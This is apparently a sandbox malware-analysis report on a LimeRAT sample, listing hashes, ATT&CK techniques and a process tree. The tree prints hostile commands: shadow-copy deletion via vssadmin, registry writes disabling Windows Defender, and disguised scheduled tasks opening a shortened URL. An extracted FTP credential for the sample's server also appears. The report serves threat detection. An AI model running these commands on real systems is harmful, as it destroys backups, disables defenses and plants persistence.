limerat | 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1

Analysis

max time kernel
151s
max time network
159s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
04-10-2022 21:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe
Size

242KB
MD5

10e6c5653d2929236947ca08594f0f55
SHA1

9ed6646ef7f0815d02066b60cd7bbc8d27cbf360
SHA256

851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1
SHA512

8db0fb767897f15cb51fcdefb5b06449e3d41e85e7d2e129fc674a2fa8077f3352dd21e3d8a8b28f4c36a5a9136df65ebd288e47ff58df9a524f650279c3ce30
SSDEEP

6144:mQvE/UVPy/oCa+LDZWC9z5NUb+knq1diDmN:3vzPygCa+DZCnq1c+

Score

10^/10

limerat evasion ransomware rat trojan

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
ftp.encompossoftware.com
Port:
21
Username:
remoteuser
Password:
Encomposx99

Signatures

Contains code to disable Windows Defender 4 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
behavioral1/memory/1988-54-0x0000000000820000-0x0000000000862000-memory.dmp	disable_win_def
behavioral1/files/0x000800000001230f-96.dat	disable_win_def
behavioral1/files/0x000800000001230f-97.dat	disable_win_def
behavioral1/memory/2744-98-0x0000000000D30000-0x0000000000D72000-memory.dmp	disable_win_def

LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
rat limerat

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4"	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Executes dropped EXE 1 IoCs

Processes:

SystemPropertiesPerformance.exe

pid	Process
2744	SystemPropertiesPerformance.exe

Drops desktop.ini file(s) 2 IoCs

Processes:

851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\LinkM\desktop.ini	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\LinkM\desktop.ini	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe

Enumerates connected drives 3 TTPs 17 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

description	ioc	Process
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	Process
2448	schtasks.exe
2460	schtasks.exe
2472	schtasks.exe
2500	schtasks.exe
2512	schtasks.exe

Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.

Disabling Security Tools
T1089

Modify Registry
T1112

Interacts with shadow copies 2 TTPs 12 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	Process
1848	vssadmin.exe
1580	vssadmin.exe
1160	vssadmin.exe
2024	vssadmin.exe
1584	vssadmin.exe
1064	vssadmin.exe
1420	vssadmin.exe
956	vssadmin.exe
560	vssadmin.exe
1672	vssadmin.exe
828	vssadmin.exe
524	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid	Process
456	powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

powershell.exevssvc.exe851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe

description	pid	Process
Token: SeDebugPrivilege	456	powershell.exe
Token: SeBackupPrivilege	764	vssvc.exe
Token: SeRestorePrivilege	764	vssvc.exe
Token: SeAuditPrivilege	764	vssvc.exe
Token: SeDebugPrivilege	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe
Token: SeBackupPrivilege	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe
Token: SeSecurityPrivilege	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe
Token: SeBackupPrivilege	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	Process	procid_target
PID 1988 wrote to memory of 456	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	27
PID 1988 wrote to memory of 456	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	27
PID 1988 wrote to memory of 456	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	27
PID 1988 wrote to memory of 772	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	29
PID 1988 wrote to memory of 772	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	29
PID 1988 wrote to memory of 772	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	29
PID 1988 wrote to memory of 1124	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	30
PID 1988 wrote to memory of 1124	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	30
PID 1988 wrote to memory of 1124	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	30
PID 1988 wrote to memory of 1400	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	31
PID 1988 wrote to memory of 1400	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	31
PID 1988 wrote to memory of 1400	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	31
PID 1988 wrote to memory of 1960	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	32
PID 1988 wrote to memory of 1960	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	32
PID 1988 wrote to memory of 1960	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	32
PID 1988 wrote to memory of 1080	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	33
PID 1988 wrote to memory of 1080	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	33
PID 1988 wrote to memory of 1080	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	33
PID 1988 wrote to memory of 1780	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	34
PID 1988 wrote to memory of 1780	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	34
PID 1988 wrote to memory of 1780	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	34
PID 1988 wrote to memory of 684	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	35
PID 1988 wrote to memory of 684	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	35
PID 1988 wrote to memory of 684	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	35
PID 1988 wrote to memory of 1952	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	36
PID 1988 wrote to memory of 1952	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	36
PID 1988 wrote to memory of 1952	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	36
PID 1988 wrote to memory of 904	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	37
PID 1988 wrote to memory of 904	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	37
PID 1988 wrote to memory of 904	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	37
PID 1988 wrote to memory of 568	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	38
PID 1988 wrote to memory of 568	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	38
PID 1988 wrote to memory of 568	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	38
PID 1988 wrote to memory of 1204	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	39
PID 1988 wrote to memory of 1204	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	39
PID 1988 wrote to memory of 1204	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	39
PID 1988 wrote to memory of 1632	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	42
PID 1988 wrote to memory of 1632	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	42
PID 1988 wrote to memory of 1632	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	42
PID 1988 wrote to memory of 628	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	44
PID 1988 wrote to memory of 628	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	44
PID 1988 wrote to memory of 628	1988	851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe	44
PID 1204 wrote to memory of 1420	1204	cmd.exe	60
PID 1204 wrote to memory of 1420	1204	cmd.exe	60
PID 1204 wrote to memory of 1420	1204	cmd.exe	60
PID 568 wrote to memory of 1064	568	cmd.exe	59
PID 568 wrote to memory of 1064	568	cmd.exe	59
PID 568 wrote to memory of 1064	568	cmd.exe	59
PID 1952 wrote to memory of 524	1952	cmd.exe	58
PID 1952 wrote to memory of 524	1952	cmd.exe	58
PID 1952 wrote to memory of 524	1952	cmd.exe	58
PID 628 wrote to memory of 828	628	cmd.exe	57
PID 628 wrote to memory of 828	628	cmd.exe	57
PID 628 wrote to memory of 828	628	cmd.exe	57
PID 904 wrote to memory of 1584	904	cmd.exe	55
PID 904 wrote to memory of 1584	904	cmd.exe	55
PID 904 wrote to memory of 1584	904	cmd.exe	55
PID 1632 wrote to memory of 1672	1632	cmd.exe	56
PID 1632 wrote to memory of 1672	1632	cmd.exe	56
PID 1632 wrote to memory of 1672	1632	cmd.exe	56
PID 772 wrote to memory of 956	772	cmd.exe	62
PID 772 wrote to memory of 956	772	cmd.exe	62
PID 772 wrote to memory of 956	772	cmd.exe	62
PID 1124 wrote to memory of 384	1124	cmd.exe	61

C:\Users\Admin\AppData\Local\Temp\851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe
"C:\Users\Admin\AppData\Local\Temp\851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies security service
- Drops desktop.ini file(s)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1988
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:456
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin Delete Shadows /all /quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:772
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:956
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1124
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
    3⤵
    PID:384
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  PID:1400
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:560
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  PID:1960
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1160
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  PID:1080
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2024
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  PID:1780
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1848
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  PID:684
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1580
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1952
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:524
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:904
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1584
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:568
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1064
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1204
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1420
- C:\Windows\system32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1632
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1672
- C:\Windows\system32\cmd.exe
  cmd /c Vssadmin delete shadowstorage /all /quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:628
- - C:\Windows\system32\vssadmin.exe
    Vssadmin delete shadowstorage /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:828
- C:\Windows\system32\schtasks.exe
  schtasks /create /f /st "06:17" /sc daily /mo "3" /tn "Security Chip (TPM) Function" /tr "'explorer'http://bit.ly/347IY80"
  2⤵
  - Creates scheduled task(s)
  PID:2448
- C:\Windows\system32\schtasks.exe
  schtasks /create /f /st "10:57" /sc daily /mo "4" /tn "Security Chip (TPM) Function" /tr "'explorer'http://bit.ly/347IY80"
  2⤵
  - Creates scheduled task(s)
  PID:2460
- C:\Windows\system32\schtasks.exe
  schtasks /create /f /st "19:12" /sc daily /mo "3" /tn "Security Chip (TPM) Function" /tr "'explorer'http://bit.ly/347IY80"
  2⤵
  - Creates scheduled task(s)
  PID:2472
- C:\Windows\system32\schtasks.exe
  schtasks /create /f /st "16:26" /sc weekly /mo "5" /d "Thu" /tn "Security Chip (TPM) Function" /tr "'explorer'http://bit.ly/347IY80"
  2⤵
  - Creates scheduled task(s)
  PID:2500
- C:\Windows\system32\schtasks.exe
  schtasks /create /f /st "03:07" /sc monthly /m "mar" /tn "Security Chip (TPM) Function" /tr "'explorer'http://bit.ly/347IY80"
  2⤵
  - Creates scheduled task(s)
  PID:2512
- C:\Users\Admin\AppData\Roaming\addins\SystemPropertiesPerformance.exe
  "C:\Users\Admin\AppData\Roaming\addins\SystemPropertiesPerformance.exe"
  2⤵
  - Executes dropped EXE
  PID:2744

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:764

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

File Deletion

Modify Registry

Web Service

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\addins\SystemPropertiesPerformance.exe

Filesize
242KB

MD5
10e6c5653d2929236947ca08594f0f55

SHA1
9ed6646ef7f0815d02066b60cd7bbc8d27cbf360

SHA256
851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1

SHA512
8db0fb767897f15cb51fcdefb5b06449e3d41e85e7d2e129fc674a2fa8077f3352dd21e3d8a8b28f4c36a5a9136df65ebd288e47ff58df9a524f650279c3ce30

Download Submit
C:\Users\Admin\AppData\Roaming\addins\SystemPropertiesPerformance.exe

Filesize
242KB

MD5
10e6c5653d2929236947ca08594f0f55

SHA1
9ed6646ef7f0815d02066b60cd7bbc8d27cbf360

SHA256
851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1

SHA512
8db0fb767897f15cb51fcdefb5b06449e3d41e85e7d2e129fc674a2fa8077f3352dd21e3d8a8b28f4c36a5a9136df65ebd288e47ff58df9a524f650279c3ce30

Download Submit
memory/384-84-0x0000000000000000-mapping.dmp

Download
memory/456-58-0x000007FEEBB40000-0x000007FEEC69D000-memory.dmp

Filesize
11.4MB

Download
memory/456-56-0x000007FEFBF01000-0x000007FEFBF03000-memory.dmp

Filesize
8KB

Download
memory/456-55-0x0000000000000000-mapping.dmp

Download
memory/456-60-0x000000001B720000-0x000000001BA1F000-memory.dmp

Filesize
3.0MB

Download
memory/456-61-0x00000000028FB000-0x000000000291A000-memory.dmp

Filesize
124KB

Download
memory/456-62-0x00000000028F4000-0x00000000028F7000-memory.dmp

Filesize
12KB

Download
memory/456-63-0x00000000028FB000-0x000000000291A000-memory.dmp

Filesize
124KB

Download
memory/456-59-0x00000000028F4000-0x00000000028F7000-memory.dmp

Filesize
12KB

Download
memory/456-57-0x000007FEEC6A0000-0x000007FEED0C3000-memory.dmp

Filesize
10.1MB

Download
memory/524-79-0x0000000000000000-mapping.dmp

Download
memory/560-87-0x0000000000000000-mapping.dmp

Download
memory/568-73-0x0000000000000000-mapping.dmp

Download
memory/628-76-0x0000000000000000-mapping.dmp

Download
memory/684-70-0x0000000000000000-mapping.dmp

Download
memory/772-64-0x0000000000000000-mapping.dmp

Download
memory/828-80-0x0000000000000000-mapping.dmp

Download
memory/904-72-0x0000000000000000-mapping.dmp

Download
memory/956-83-0x0000000000000000-mapping.dmp

Download
memory/1064-78-0x0000000000000000-mapping.dmp

Download
memory/1080-68-0x0000000000000000-mapping.dmp

Download
memory/1124-65-0x0000000000000000-mapping.dmp

Download
memory/1160-88-0x0000000000000000-mapping.dmp

Download
memory/1204-74-0x0000000000000000-mapping.dmp

Download
memory/1400-66-0x0000000000000000-mapping.dmp

Download
memory/1420-77-0x0000000000000000-mapping.dmp

Download
memory/1580-86-0x0000000000000000-mapping.dmp

Download
memory/1584-81-0x0000000000000000-mapping.dmp

Download
memory/1632-75-0x0000000000000000-mapping.dmp

Download
memory/1672-82-0x0000000000000000-mapping.dmp

Download
memory/1780-69-0x0000000000000000-mapping.dmp

Download
memory/1848-85-0x0000000000000000-mapping.dmp

Download
memory/1952-71-0x0000000000000000-mapping.dmp

Download
memory/1960-67-0x0000000000000000-mapping.dmp

Download
memory/1988-54-0x0000000000820000-0x0000000000862000-memory.dmp

Filesize
264KB

Download
memory/2024-89-0x0000000000000000-mapping.dmp

Download
memory/2448-90-0x0000000000000000-mapping.dmp

Download
memory/2460-91-0x0000000000000000-mapping.dmp

Download
memory/2472-92-0x0000000000000000-mapping.dmp

Download
memory/2500-93-0x0000000000000000-mapping.dmp

Download
memory/2512-94-0x0000000000000000-mapping.dmp

Download
memory/2744-95-0x0000000000000000-mapping.dmp

Download
memory/2744-98-0x0000000000D30000-0x0000000000D72000-memory.dmp

Filesize
264KB

Download